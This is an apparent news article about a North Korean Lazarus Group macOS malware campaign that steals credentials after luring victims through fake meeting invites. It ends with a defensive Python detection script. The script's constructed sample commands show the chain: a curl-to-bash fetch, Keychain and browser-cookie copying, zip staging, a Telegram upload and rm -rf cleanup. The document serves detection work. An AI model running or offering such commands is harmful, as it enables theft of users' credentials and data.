
North Korean Lazarus Group Deploys 'Mach-O Man' Malware Targeting Fintech and Crypto Firms

Apr 22, 2026 14:20 UTC
AAPL
Immediate term

A macOS malware campaign is using fake meeting invites to get a foothold on corporate systems and steal credentials. The operation, attributed to the state-sponsored Lazarus Group, targets both crypto-native firms and traditional financial institutions.

  • New 'Mach-O Man' malware targets macOS devices in fintech and crypto
  • Social engineering via fake meeting invites bypasses traditional security
  • Steals browser data, cookies, and macOS Keychain entries
  • Exfiltrates data through Telegram and employs self-deletion scripts
  • Lazarus Group previously linked to $1.4 billion Bybit hack

Security researchers have identified a new macOS-specific malware kit, dubbed 'Mach-O Man,' attributed to the North Korea-linked Lazarus Group. The campaign relies on social engineering rather than an exploit to get past security controls and gain access to corporate infrastructure.

Initial access uses a 'ClickFix'-style lure: victims are drawn into a fraudulent Zoom or Google Meet call and, once engaged, are told to run a command themselves, typically framed as a fix for a meeting-client problem. That command silently downloads the malware in the background. The payload then harvests browser credentials, cookies, and macOS Keychain entries, packs the collected data into zip archives, and exfiltrates the archives to the attackers through Telegram.

To hinder detection and forensic analysis, the kit finishes with a self-deletion script that removes its own files with the 'rm' command. No elevated permissions are needed for this: because the victim ran the initial command, the malware already executes with the victim's own user rights, which suffice to delete everything it created.

The Lazarus Group has a documented history of high-profile thefts, including the 2025 Bybit exchange hack totaling $1.4 billion. Earlier in April, AI-enabled social engineering was used to steal approximately $100,000 from the Zerion crypto wallet after attackers obtained private keys and logged-in sessions.

The expansion of targeting from fintech firms to traditional businesses points to a growing systemic risk for macOS users in the financial sector. Since the campaign bypasses technical controls by having the user do the work, the practical defence is procedural: treat unsolicited third-party meeting invites with suspicion, and never paste a command from a meeting page or chat into a terminal.
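The chain described above (remote script piped into a shell, Keychain and browser-cookie access, zip staging, Telegram upload, rm cleanup) is easy to spot in command-line telemetry once the stages are looked at together rather than one at a time. The following triage script is an added example, not code from the article or from any vendor report. It assumes process-execution records are available one command per line (as a unified-log or EDR export would provide) and uses generic TTP-shaped rules and constructed sample lines, not indicators from any real sample.

```python
"""Rule-based triage of macOS command-line telemetry for ClickFix-style
credential-theft chains.

Added example; not the article's or any vendor's code. Assumptions:
input is a list of command lines (one process execution each); rule
names and stage labels are our own; SAMPLE_COMMANDS and BENIGN_COMMANDS
are constructed for illustration and contain no real indicators.
"""
import re
from dataclasses import dataclass, field

# (rule name, kill-chain stage, pattern). Patterns describe the shape of
# each technique, not a signature for a specific binary or domain.
RULES = [
    ("remote_script_pipe", "initial-access",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b")),
    ("base64_decode_exec", "initial-access",
     re.compile(r"base64\s+(-d|--decode|-D)")),
    ("keychain_access", "collection",
     re.compile(r"(login\.keychain(-db)?|\bsecurity\s+(find-generic-password|dump-keychain))")),
    ("browser_cookie_db", "collection",
     re.compile(r"(Chrome|Chromium|BraveSoftware)/[^ ]*Cookies|Firefox/Profiles/[^ ]*cookies\.sqlite")),
    ("staging_archive", "staging",
     re.compile(r"\bzip\s+-r\b|\bditto\s+-c\b")),
    ("telegram_bot_api", "exfiltration",
     re.compile(r"api\.telegram\.org/bot[^/\s]+/send(Document|Message)")),
    ("self_delete", "anti-forensics",
     re.compile(r"\brm\s+-r?f\b.*(\$0|\$HOME/\.(zsh|bash)_history|/tmp/)")),
]


@dataclass
class Finding:
    line_no: int
    rule: str
    stage: str
    command: str


@dataclass
class Verdict:
    severity: str           # none | low | medium | high
    stages: list            # distinct stages, in order first seen
    findings: list = field(default_factory=list)


def scan_commands(commands):
    """Match every rule against every command, then grade the whole
    sequence: collection plus exfiltration in the same window is 'high';
    two or more stages is 'medium'; a single stage (e.g. a lone zip -r)
    is 'low' so that ordinary admin activity does not page anyone."""
    findings = []
    for i, cmd in enumerate(commands, 1):
        for name, stage, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(i, name, stage, cmd))
    stages = []
    for f in findings:
        if f.stage not in stages:
            stages.append(f.stage)
    if "collection" in stages and "exfiltration" in stages:
        severity = "high"
    elif len(stages) >= 2:
        severity = "medium"
    elif stages:
        severity = "low"
    else:
        severity = "none"
    return Verdict(severity, stages, findings)


# Constructed sample resembling the chain in the article. Placeholder
# host, token and chat id; nothing here is a real indicator.
SAMPLE_COMMANDS = [
    'curl -fsSL https://meet-update.example/fix.sh | bash',
    'echo "aGVsbG8=" | base64 -d > /tmp/.u && chmod +x /tmp/.u',
    'cp "$HOME/Library/Keychains/login.keychain-db" /tmp/.stage/kc',
    'cp "$HOME/Library/Application Support/Google/Chrome/Default/Cookies" /tmp/.stage/ck',
    'zip -r /tmp/.stage/out.zip /tmp/.stage',
    'curl -s -F document=@/tmp/.stage/out.zip "https://api.telegram.org/bot<TOKEN>/sendDocument?chat_id=<ID>"',
    'rm -rf /tmp/.stage /tmp/.u "$0"',
]

# Constructed benign activity: one archive command on its own should not
# be graded above 'low'.
BENIGN_COMMANDS = [
    'brew update && brew upgrade',
    'zip -r backup.zip ~/Documents/project',
    'git pull origin main',
]


def report(verdict):
    lines = [f"severity={verdict.severity} stages={','.join(verdict.stages)}"]
    for f in verdict.findings:
        lines.append(f"  line {f.line_no}: {f.rule} [{f.stage}] :: {f.command}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(scan_commands(SAMPLE_COMMANDS)))
    print(report(scan_commands(BENIGN_COMMANDS)))
```

The grading deliberately keys on stage combinations rather than any single command: `zip -r` or a Keychain copy alone is routine, while collection followed by a Telegram Bot API upload from the same host is not. In production the same rules would be run over a short time window per user, and the self-delete rule is the reason to ship telemetry off-host immediately rather than rely on files surviving on disk.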
